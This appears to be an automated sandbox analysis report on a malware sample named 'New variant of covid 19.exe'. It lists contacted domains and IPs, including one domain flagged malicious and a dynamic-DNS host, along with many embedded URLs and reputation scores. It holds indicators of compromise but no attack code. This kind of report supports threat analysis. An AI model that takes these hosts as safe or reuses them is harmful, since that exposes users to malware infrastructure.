      https://dynamic.t0%URL Reputationsafe
      https://i2-prod.liverpool.com/incoming/article19945821.ece/ALTERNATES/s180/0_Salah-Goal-vs-Leeds.jpg0%Avira URL Cloudsafe
      https://i2-prod.liverpool.com/incoming/article19960478.ece/ALTERNATES/s180/0_WhatsApp-Image-2021-03-0%Avira URL Cloudsafe
      https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s270b/0_RobertsonCross1.jpg0%Avira URL Cloudsafe
      https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s458/0_GettyImages-1273716690.0%Avira URL Cloudsafe
      https://www.liverpool.com/all-about/ozan-kabak0%Avira URL Cloudsafe
      https://s2-prod.mirror.co.uk/0%Avira URL Cloudsafe
      https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s180/0_WhatsApp-Image-2021-02-0%Avira URL Cloudsafe
      https://www.liverpool.com/all-about/champions-league0%Avira URL Cloudsafe
      https://www.liverpool.com/all-about/curtis-jones0%Avira URL Cloudsafe
      https://i2-prod.liverpool.com/incoming/article19960206.ece/ALTERNATES/s615/0_WhatsApp-Image-2021-03-0%Avira URL Cloudsafe
      https://www.liverpool.com/all-about/steven-gerrard0%Avira URL Cloudsafe
      https://www.liverpool.com/liverpool-fc-news/features/liverpool-ozan-kabak-future-audition-199546160%Avira URL Cloudsafe
      https://i2-prod.liverpool.com/incoming/article19963923.ece/ALTERNATES/s458/1_WhatsApp-Image-2021-03-0%Avira URL Cloudsafe
      https://www.liverpool.com/liverpool-fc-news/features/liverpool-penalties-premier-league-var-171713910%Avira URL Cloudsafe
      https://www.liverpool.com/schedule/0%Avira URL Cloudsafe
      http://liverpoolofcfanclub.com/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-59F952AF6E65CA37DF9A6DD24C3AD6F0.html0%Avira URL Cloudsafe
      https://s2-prod.liverpool.com/0%Avira URL Cloudsafe
      https://www.liverpool.com/liverpool-fc-news/features/liverpool-champions-league-jurgen-klopp-19961940%Avira URL Cloudsafe
      https://i2-prod.liverpool.com/incoming/article19955390.ece/ALTERNATES/s220b/0_GettyImages-12313538370%Avira URL Cloudsafe
      https://i2-prod.liverpool.com/incoming/article19961953.ece/ALTERNATES/s458/0_GettyImages-1302496803.0%Avira URL Cloudsafe
      https://felix.data.tm-awx.com/ampconfig.json&quot;0%Avira URL Cloudsafe
      https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s615/0_GettyImages-1273716690.0%Avira URL Cloudsafe
      https://i2-prod.liverpool.com/incoming/article19938370.ece/ALTERNATES/s270b/0_Salah-Pressing.jpg0%Avira URL Cloudsafe
      https://i2-prod.liverpool.com/incoming/article19945821.ece/ALTERNATES/s615/0_Salah-Goal-vs-Leeds.jpg0%Avira URL Cloudsafe
      https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s270b/0_WhatsApp-Image-2021-020%Avira URL Cloudsafe
      https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s220b/0_RobertsonCross1.jpg0%Avira URL Cloudsafe
      https://www.liverpool.com/liverpool-fc-news/features/liverpool-andy-robertson-valuable-quality-199460%Avira URL Cloudsafe
      https://www.liverpool.com/liverpool-fc-news/features/liverpool-jurgen-klopp-pressing-tactics-19938360%Avira URL Cloudsafe
      https://i2-prod.liverpool.com/incoming/article19938370.ece/ALTERNATES/s615/0_Salah-Pressing.jpg0%Avira URL Cloudsafe

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      ip-api.com
      		208.95.112.1
      		truefalse
        		high
        liverpoolofcfanclub.com
        		104.21.31.39
        		truetrueunknown
        devils.shacknet.us
        		103.28.70.164
        		truefalseunknown

        Contacted URLs

        NameMaliciousAntivirus DetectionReputation
        http://liverpoolofcfanclub.com/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-62D0D2B15CF140C87AEA01E41DD7046D.htmltrue
        • Avira URL Cloud: safe
        		unknown
        http://liverpoolofcfanclub.com/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-75F90208612A44FA7B0856621DD5DF3A.htmltrue
        • Avira URL Cloud: safe
        		unknown
        http://liverpoolofcfanclub.com/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-59F952AF6E65CA37DF9A6DD24C3AD6F0.htmltrue
        • Avira URL Cloud: safe
        		unknown

        URLs from Memory and Binaries

        NameSourceMaliciousAntivirus DetectionReputation
        https://i2-prod.liverpool.com/incoming/article19955855.ece/ALTERNATES/s458/0_GettyImages-1304940818.New variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        https://dev.ditu.live.com/REST/v1/Routes/svchost.exe, 0000001B.00000002.311128902.000002237723D000.00000004.00000001.sdmpfalse
          		high
          https://t0.tiles.ditu.live.com/tiles/gensvchost.exe, 0000001B.00000003.309882014.000002237724E000.00000004.00000001.sdmpfalse
            		high
            https://i2-prod.liverpool.com/incoming/article19957561.ece/ALTERNATES/s458/1_FreeAgentPlayers.jpgNew variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://c.amazon-adsystem.com/aax2/apstag.jsNew variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpfalse
              		high
              https://www.liverpool.com/liverpool-fc-news/features/liverpool-arsenal-klopp-lijnders-carabao-171668svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://dev.virtualearth.net/REST/v1/Routes/Walkingsvchost.exe, 0000001B.00000003.309958248.0000022377260000.00000004.00000001.sdmpfalse
                		high
                https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s615/0_WhatsApp-Image-2021-02-New variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://i2-prod.liverpoolecho.co.uk/incoming/article17165318.ece/ALTERNATES/s615/2_GettyImages-11837svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s220b/0_GettyImages-1273716690New variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://i2-prod.liverpool.com/incoming/article19961953.ece/ALTERNATES/s180/0_GettyImages-1302496803.New variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://dev.ditu.live.com/REST/v1/Imagery/Copyright/svchost.exe, 0000001B.00000003.310012576.0000022377249000.00000004.00000001.sdmpfalse
                  		high
                  https://dev.virtualearth.net/REST/v1/Transit/Schedules/svchost.exe, 0000001B.00000002.311156508.0000022377242000.00000004.00000001.sdmpfalse
                    		high
                    https://i2-prod.liverpool.com/incoming/article19945821.ece/ALTERNATES/s270b/0_Salah-Goal-vs-Leeds.jpNew variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://i2-prod.liverpool.com/incoming/article19960478.ece/ALTERNATES/s615/0_WhatsApp-Image-2021-03-New variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://www.liverpool.com/all-about/premier-leaguesvchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://i2-prod.liverpool.com/incoming/article19938370.ece/ALTERNATES/s180/0_Salah-Pressing.jpgNew variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s615/0_Curtis-10.pngNew variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://i2-prod.liverpool.com/incoming/article19963923.ece/ALTERNATES/s180/1_WhatsApp-Image-2021-03-New variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://www.liverpool.com/liverpool-fc-news/svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://www.liverpool.com/schedule/liverpool-arsenal-carabao-cup-klopp-17166154New variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://ip-api.comNew variant of covid 19.exe, 0000000A.00000002.744575828.0000000002F31000.00000004.00000001.sdmpfalse
                      		high
                      https://i2-prod.liverpool.com/incoming/article19955390.ece/ALTERNATES/s615/0_GettyImages-1231353837.New variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://www.liverpool.com/liverpool-fc-news/features/liverpool-psg-transfer-news-19957850svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://api.ipify.org/New variant of covid 19.exe, 0000000A.00000002.737784433.0000000000402000.00000040.00000001.sdmpfalse
                        		high
                        https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s220b/0_WhatsApp-Image-2021-02New variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://appexmapsappupdate.blob.core.windows.netsvchost.exe, 0000001B.00000003.309958248.0000022377260000.00000004.00000001.sdmpfalse
                          		high
                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameNew variant of covid 19.exe, 0000000A.00000002.744575828.0000000002F31000.00000004.00000001.sdmpfalse
                            		high
                            http://www.bingmapsportal.comsvchost.exe, 0000001B.00000002.311005148.0000022377213000.00000004.00000001.sdmpfalse
                              		high
                              https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s180/0_RobertsonCross1.jpgNew variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://ads.pubmatic.com/AdServer/js/pwt/156997/3236/pwt.jsNew variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpfalse
                                		high
                                https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s270b/0_Curtis-10.pngNew variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://www.liverpool.com/liverpool-fc-news/transfer-news/fsg-liverpool-gini-wijnaldum-transfer-1876svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://freegeoip.net/xml/New variant of covid 19.exe, 0000000A.00000002.737784433.0000000000402000.00000040.00000001.sdmpfalse
                                  		high
                                  https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=svchost.exe, 0000001B.00000003.310135786.0000022377245000.00000004.00000001.sdmpfalse
                                    		high
                                    http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000022.00000002.413593519.0000000004CB2000.00000004.00000001.sdmpfalse
                                      		high
                                      http://schemas.datacontract.org/2004/07/New variant of covid 19.exe, 0000000A.00000002.744882535.0000000002F6A000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      		unknown
                                      https://dev.virtualearth.net/REST/v1/Routes/svchost.exe, 0000001B.00000002.311128902.000002237723D000.00000004.00000001.sdmpfalse
                                        		high
                                        https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s615/0_RobertsonCross1.jpgNew variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://www.liverpool.com/liverpool-fc-news/features/jurgen-klopp-liverpool-transfer-targets-1996166svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://www.liverpool.com/liverpool-fc-news/transfer-news/liverpool-erling-haaland-transfer-weghorstsvchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://reachplc.hub.loginradius.com&quot;New variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		low
                                        https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s220b/0_Curtis-10.pngNew variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://i2-prod.liverpool.com/incoming/article19960206.ece/ALTERNATES/s180/0_WhatsApp-Image-2021-03-New variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://i2-prod.liverpool.com/incoming/article19955855.ece/ALTERNATES/s615/0_GettyImages-1304940818.New variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s270b/0_GettyImages-1273716690New variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://s2-prod.liverpool.comsvchost.exe, 00000011.00000003.281475012.000000000393A000.00000004.00000001.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=svchost.exe, 0000001B.00000002.311128902.000002237723D000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000002.311005148.0000022377213000.00000004.00000001.sdmpfalse
                                          		high
                                          https://www.liverpool.com/liverpool-fc-news/features/mohamed-salah-liverpool-goal-flaw-19945816svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://%s.xboxlive.comsvchost.exe, 00000018.00000002.739177943.0000017126845000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		low
                                          https://dev.virtualearth.net/REST/v1/Locationssvchost.exe, 0000001B.00000003.287773862.0000022377231000.00000004.00000001.sdmpfalse
                                            		high
                                            https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=svchost.exe, 0000001B.00000003.287773862.0000022377231000.00000004.00000001.sdmpfalse
                                              		high
                                              https://i2-prod.liverpool.com/incoming/article19955390.ece/ALTERNATES/s270b/0_GettyImages-1231353837New variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://i2-prod.liverpool.comsvchost.exe, 00000011.00000003.281475012.000000000393A000.00000004.00000001.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://felix.data.tm-awx.com/felix.min.jsNew variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://dynamic.tsvchost.exe, 0000001B.00000003.310012576.0000022377249000.00000004.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              		unknown
                                              https://i2-prod.liverpool.com/incoming/article19945821.ece/ALTERNATES/s180/0_Salah-Goal-vs-Leeds.jpgNew variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://i2-prod.liverpool.com/incoming/article19960478.ece/ALTERNATES/s180/0_WhatsApp-Image-2021-03-New variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://dev.virtualearth.net/REST/v1/Routes/Transitsvchost.exe, 0000001B.00000003.309958248.0000022377260000.00000004.00000001.sdmpfalse
                                                		high
                                                https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s270b/0_RobertsonCross1.jpgNew variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s458/0_GettyImages-1273716690.svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://www.liverpool.com/all-about/ozan-kabakNew variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000022.00000002.413593519.0000000004CB2000.00000004.00000001.sdmpfalse
                                                  		high
                                                  https://s2-prod.mirror.co.uk/svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s180/0_WhatsApp-Image-2021-02-New variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://www.liverpool.com/all-about/champions-leaguesvchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://www.liverpool.com/all-about/curtis-jonesNew variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=svchost.exe, 0000001B.00000002.311281205.000002237725C000.00000004.00000001.sdmpfalse
                                                    		high
                                                    https://i2-prod.liverpool.com/incoming/article19960206.ece/ALTERNATES/s615/0_WhatsApp-Image-2021-03-New variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://www.liverpool.com/all-about/steven-gerrardNew variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=svchost.exe, 0000001B.00000003.310012576.0000022377249000.00000004.00000001.sdmpfalse
                                                      		high
                                                      https://www.liverpool.com/liverpool-fc-news/features/liverpool-ozan-kabak-future-audition-19954616svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://i2-prod.liverpool.com/incoming/article19963923.ece/ALTERNATES/s458/1_WhatsApp-Image-2021-03-New variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://www.liverpool.com/liverpool-fc-news/features/liverpool-penalties-premier-league-var-17171391svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://schema.org/NewsArticleNew variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpfalse
                                                        		high
                                                        https://www.liverpool.com/schedule/svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://schema.org/BreadcrumbListNew variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpfalse
                                                          		high
                                                          https://securepubads.g.doubleclick.net/tag/js/gpt.jsNew variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpfalse
                                                            		high
                                                            https://dev.virtualearth.net/REST/v1/Routes/Drivingsvchost.exe, 0000001B.00000003.309958248.0000022377260000.00000004.00000001.sdmpfalse
                                                              		high
                                                              https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashxsvchost.exe, 0000001B.00000002.311128902.000002237723D000.00000004.00000001.sdmpfalse
                                                                		high
                                                                https://s2-prod.liverpool.com/svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://www.liverpool.com/liverpool-fc-news/features/liverpool-champions-league-jurgen-klopp-1996194svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://i2-prod.liverpool.com/incoming/article19955390.ece/ALTERNATES/s220b/0_GettyImages-1231353837New variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://i2-prod.liverpool.com/incoming/article19961953.ece/ALTERNATES/s458/0_GettyImages-1302496803.New variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=svchost.exe, 0000001B.00000002.311156508.0000022377242000.00000004.00000001.sdmpfalse
                                                                  		high
                                                                  https://felix.data.tm-awx.com/ampconfig.json&quot;New variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s615/0_GettyImages-1273716690.svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  https://i2-prod.liverpool.com/incoming/article19938370.ece/ALTERNATES/s270b/0_Salah-Pressing.jpgNew variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
